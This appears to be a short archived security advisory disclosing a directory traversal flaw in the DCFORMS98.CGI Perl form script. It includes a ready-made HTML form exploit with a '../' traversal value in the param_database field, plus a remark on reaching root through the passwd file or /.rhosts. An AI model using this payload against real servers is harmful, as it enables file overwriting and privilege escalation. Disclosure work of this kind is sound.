SUID Advisory #5 - DCFORMS98.CGI Advisory - Anyone can create / truncate any file owned by the web server user.
622d24605c915932cd5a7cb660b480ecd49f2adef13453625c046a4da0b01370suid@suid.kg - mini advisory - DCFORMS98.CGI
Software: DCFORMS98.CGI
Vendor: dcscripts.com
URL: http://www.dcscripts.com/dcforms98.shtml
Version: Version 1.0
Platforms: Unix
Type: Input validation problem
Summary:
Anyone can create / truncate any file owned
by the web server user (nobody/apache/whatever).
Vulnerability:
The perl code does no input validation so reverse directory
transversal is possible when specifying a `param_database`.
Exploit:
Build a HTML form resembling:
<form action=/cgi-bin/dcforms98.cgi method=post>
<INPUT TYPE="hidden" name="param_recipient" value="non@existant">
<INPUT TYPE="hidden" name="param_subject" value="X">
<INPUT TYPE="hidden" name="param_env_report" value="">
<INPUT TYPE="hidden" name="param_order" value="Name">
<!-- This is obviously the problem -->
<INPUT TYPE="hidden" name="param_database"
value="../../../../../../../../../../tmp/xxx">
<INPUT TYPE="hidden" name="param_required" value="Name">
<INPUT TYPE="hidden" name="param_redirect_url" value="">
<input type=hidden name=Name value=blah>
<input type=submit>
</form>
If httpd is running with UID == 0, you could easily get root
by adding to the passwd file or /.rhosts.
Of course you could simply send this in a POST request directly
to the web server. Whatever.
http://www.suid.edu/advisories/005.txt
EOF
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed